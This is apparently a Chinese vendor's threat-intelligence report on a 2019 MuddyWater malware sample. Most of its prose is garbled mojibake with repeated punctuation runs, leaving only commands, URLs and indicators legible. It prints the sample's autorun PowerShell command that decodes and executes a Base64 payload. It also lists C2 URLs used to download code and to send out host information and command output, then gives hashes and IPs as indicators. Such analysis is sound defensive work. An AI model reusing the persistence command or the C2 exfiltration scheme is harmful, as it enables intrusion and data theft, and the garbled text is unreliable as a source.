MuddyWater£¨ÎÛË®£©×îй¥»÷ÑùÌìÖ°Îö
Ðû²¼Ê±¼ä 2019-05-10¿ËÈÕ£¬£¬£¬£¬£¬Z6×ðÁú¿Ê±½ð¾¦Çå¾²Ñо¿ÍŶÓͨ¹ýVenusEyeÍþвÇ鱨ÖÐÐÄá÷ÁÔϵͳ²¶»ñµ½Ò»¸ö¿ÉÒÉÎĵµ£¬£¬£¬£¬£¬¾Ì«¹ýÎöÈ·ÈÏÆäΪMuddyWater×îй¥»÷Ñù±¾¡£¡£¡£
ÔØºÉÆÊÎö
¹¥»÷Ñù±¾ÎªÒ»¸öWordÎĵµ£¬£¬£¬£¬£¬·¿ªºó»áÏÔʾÈçÏÂͼƬ£¬£¬£¬£¬£¬ÓÕʹÊܺ¦Õ߯ôÓúꡣ¡£¡£
ºê´úÂëÖ´Ðк󣬣¬£¬£¬£¬»áÊÍ·Åc:\programdata\SysTextEnc.iniÎļþ¡£¡£¡£¸ÃÎļþÄÚÈÝΪһ´®Base64±àÂëÊý¾Ý¡£¡£¡£
È»ºóÏòÆô¶¯ÏîдÈëÈçÏÂÏÂÁîÐУº
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -w 1 -exec bypass -c "$ste=gc
c:\programdata\SysTextEnc.ini;iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($ste)))"
ÓÃÓÚ¿ª»ú½âÃܲ¢Ö´ÐÐc:\programdata\SysTextEnc.iniÎļþ¡£¡£¡£½âÃÜÖ®ºóΪһ¶Îpowershell´úÂ룬£¬£¬£¬£¬¸Ã´úÂëÓÃÓÚÇëÇóhxxp://38.132.99.167/crf.txtÁ´½ÓµÄÊý¾Ý²¢Ö´ÐУ¬£¬£¬£¬£¬¸ÃÁ´½Ó·µ»ØµÄÊý¾ÝÈÔÈ»ÊÇÒ»¶ÎPowershell´úÂë¡£¡£¡£
ľÂíÆÊÎö
ÉÏÊöÀú³ÌÖÐÏÂÔØµÄPowershell´úÂë¼´MuddyWater×é֯ϰÓõÄpowershellľÂí¡£¡£¡£
½â»ìÏýºó£¬£¬£¬£¬£¬ÆäÖ÷º¯ÊýÈçÏÂËùʾ£º
ÒÀ´ÎÖ´ÐÐwlChecul£¬£¬£¬£¬£¬pmrHlsl£¬£¬£¬£¬£¬GECOANOO£¬£¬£¬£¬£¬gfxEcmdascrsltpÕâËĸöº¯Êý¡£¡£¡£ÆäÖÐwlCheculÖ»ÊÇΪÁËÈ·ÈÏЧÀÍÆ÷×¼±¸×´Ì¬¡£¡£¡£½á¹¹ÈçÏÂURL²¢ÒÔPOST·½·¨·¢ËÍÇëÇó£º
http://82.102.8.101/bcerrxy.php?rCecms=BlackWater
ÈôÊÇ·µ»ØÖµ²»Îª¿ÕÇÒ²»Îª%COPYTHAT%²Å»áÖ´ÐкóÐøº¯Êý¡£¡£¡£Ö®ºóÖ´ÐÐpmrHlslº¯Êý£¬£¬£¬£¬£¬¸Ãº¯Êý»áŲÓÃWMI»ñÈ¡¶àÖÖÅÌËã»úÐÅÏ¢¡£¡£¡£
½«»ñµÃµÄÐÅϢʹÓá°*¡±¾ÙÐÐÆ´½Ó¡£¡£¡£ÅÌËãÆ´½Óºó×Ö·û´®µÄMD5£¬£¬£¬£¬£¬Ôٺ͡°*1997* EP1¡±¾ÙÐÐÆ´½Ó£¬£¬£¬£¬£¬×îºó¾ÙÐÐbase64±àÂë¡£¡£¡£
Ö®ºó½«½á¹¹³öÀ´µÄBase64±àÂëÊý¾ÝÆ´½Ó³ÉÈçÏÂURL²¢ÒÔPOST·½·¨·¢ËͳöÈ¥£º
http://82.102.8.101/bcerrxy.php?riHl=[EncryptedData]
ÈôÊÇ·µ»ØÐ§¹û²»Îª¿Õ²¢ÇÒ²»Îª%BYE%Ôò¼ÌÐøºóÐøº¯ÊýµÄÖ´ÐС£¡£¡£½ÓÏÂÀ´ÒªÖ´Ðеĺ¯ÊýΪGECOANOO¡£¡£¡£
GeCOANOOº¯Êý½á¹¹ÈçÏÂÊý¾Ý£¬£¬£¬£¬£¬²¢ÒÔPOST·½·¨½«Æä·¢ËͳöÈ¥£º
http://82.102.8.101/bcerrxy.php?cienentit=[EncryptedData]
ÆäÖеÄEncryptedData¼´ÉÏÒ»´Î·¢ËÍÊý¾ÝÖоÙÐÐBase64±àÂëµÄMD5²¿·Ö¡£¡£¡£ÈôÊÇ·µ»ØÐ§¹û²»Îª¿ÕÇÒ·µ»ØÖµ¾ÓÉbase64½âÂëºó²»Îª"SHH"£¬£¬£¬£¬£¬Ôò½«½âÂëºóµÄ·µ»ØÖµ¸³Öµ¸øÒ»¸öÈ«¾Ö±äÁ¿gecdrEu£¬£¬£¬£¬£¬È»ºóÖ´ÐÐÏÂÒ»¸öº¯Êý£¬£¬£¬£¬£¬¿ÉÒÔÅжϸ³Öµ¸øgecdrEuµÄÊý¾ÝΪһ¶Îpowershell´úÂë¡£¡£¡£
×îºóͨ¹ýgfxEcmdascrsltpº¯ÊýÖ´ÐÐÈ«¾Ö±äÁ¿ÖеÄgecdrEuÖеÄpowershell´úÂë¡£¡£¡£
²¢½«·µ»ØÖµ¾ÙÐÐbase64±àÂ룬£¬£¬£¬£¬Æ´¼¯³ÉÈçϵÄURLÃûÌþÙÐÐÉÏ´«¡£¡£¡£
http://82.102.8.101/bcerrxy.php?zCre=[Base64Str]
ËÝÔ´ÆÊÎö
ͨ¹ýVenusEyeÍþвÇ鱨ÖÐÐĹØÁªÏµÍ³£¬£¬£¬£¬£¬ÎÒÃÇ·¢Ã÷ÁËÁíÒ»¸öÔçÆÚµÄÑù±¾¡£¡£¡£
¸ÃÑù±¾ËùʹÓõÄÊÖÒÕ¶¼Óë±¾´ÎÎÒÃÇ·¢Ã÷µÄÑù±¾Èç³öÒ»ÕÞ¡£¡£¡£
ͨ¹ýËÝÔ´ÆÊÎö£¬£¬£¬£¬£¬ÎÒÃÇ·¢Ã÷ÕâÁ½¸öÑù±¾¶¼ÓëÓÑÉÌ4ÔÂ10ÈÕÔÚÉ罻ýÌåÉÏÅû¶µÄMuddyWater¹¥»÷ÍÁ¶úÆäµÄÑùÄÚÇéËÆ¡£¡£¡£ÏÂÃæÊÇÁ½Õߵĺê´úÂë±ÈÕÕ¡£¡£¡£
Ïà±È֮ϣ¬£¬£¬£¬£¬ÔçÆÚ·¢Ã÷µÄÑù±¾½«ÉÏÏßÇëÇó¡¢»ñÈ¡powershell´úÂë¡¢ÉÏ´«ÏÂÁîÐÐÖ´ÐÐЧ¹û²ð·Ö³É²î±ðPHP¾ÙÐн»»¥¡£¡£¡£¶øÏÖÔڵİ汾ÔòʹÓÃͳһ¸öPHPÎļþ¾ÙÐн»»¥¡£¡£¡£²¢ÇÒÔçÆÚ°æ±¾ÈôÊÇÔÚÖ´ÐÐÀú³ÌÖÐÓöµ½¹ýʧ£¬£¬£¬£¬£¬Ôò»á½«¹ýʧÐÅÏ¢¼Í¼ÈÕÖ¾£¬£¬£¬£¬£¬¿ÉÊÇ×îа汾ÔòÖ±½Ó¿¢ÊÂÄ¿½ñ³ÌÐò¡£¡£¡£
¹ØÓÚÖ´ÐÐÁ÷³ÌÀ´Ëµ£¬£¬£¬£¬£¬×îаæÄÚÇ鹨ÓÚÔçÆÚ°æ±¾Ò²Óнϴó²î±ð£¬£¬£¬£¬£¬¶þÕßµÄÖ´ÐÐÁ÷³ÌÈçÏ£º
Ïà±È֮ϣ¬£¬£¬£¬£¬×îÐµĹ¥»÷»î¶¯ÔöÌíÁËÆä»ù´¡ÉèÊ©£¬£¬£¬£¬£¬²¢ÇÒ½«Ö÷Ìå´úÂë°²Åŵ½Ô¶³ÌЧÀÍÆ÷Öжø²»ÊÇÖ±½Óͨ¹ý´¹ÂÚÎĵµÊͷŵ½ÍâµØ¡£¡£¡£¿£¿£¿£¿£¿ÉÒÔ¿´³ö¸Ã×éÖ¯ÔÚÒ»Ö±µÄ¸üÐÂÆä¹¥»÷·½·¨ºÍ·À¼ì²â·½·¨¡£¡£¡£
MuddyWater×éÖ¯×ÔÅû¶֮ÔÂË·Ö±»îÔ¾ÖÁ½ñ£¬£¬£¬£¬£¬¸Ã×éÖ¯ºÜÊÇÇàíùʹÓÃPowershell½ÅÔÀ´±àдÆä¹¥»÷¹¤¾ß£¬£¬£¬£¬£¬²¢ÑÜÉú³öÁ˸Ã×éÖ¯µÄרÓÐľÂíPOWERSTATS¡£¡£¡£ËäÈ»¸Ã×éÖ¯µÄPowershellľÂí¸üл»´úºÜ¿ì£¬£¬£¬£¬£¬¿ÉÊÇÎÒÃÇÈÔÄÜ´ÓÆäpowershell´úÂëÖп´µ½Ð©ÐíPOWERSTATSµÄÓ°×Ó¡£¡£¡£
Íþвָ±ê£¨IOC£©
97bf0d6e11ee4118993ad9c4b959c916
b0de46b50e209b185987010238fc65f0
0cd84d601971a91cc023e16d94cc7e6c
82.102.8.101
38.132.99.167
http://38.132.99.167/crf.txt
½â¾ö¼Æ»®
1¡¢Z6×ðÁú¿Ê±VenusEyeÍþвÇ鱨ÖÐÐÄÒѾ֧³Ö¶Ô±¾´Î¹¥»÷»î¶¯Ïà¹ØÇ鱨µÄÅÌÎÊ¡£¡£¡£
2¡¢ ÒѰ²ÅÅZ6×ðÁú¿Ê±IDS¡¢IPS²úÆ·µÄ¿Í»§ÇëÉý¼¶ÊÂÎñ¿âµ½×îа汾£¬£¬£¬£¬£¬¼´¿ÉÓÐÓüì²â»ò×è¶Ï¹¥»÷¡£¡£¡£
3¡¢ ÒѰ²ÅÅZ6×ðÁú¿Ê±APT¼ì²â²úÆ·µÄ¿Í»§ÎÞÐèÉý¼¶£¬£¬£¬£¬£¬¼´¿ÉÓÐÓüì²â´Ë´Î¹¥»÷¡£¡£¡£


¾©¹«Íø°²±¸11010802024551ºÅ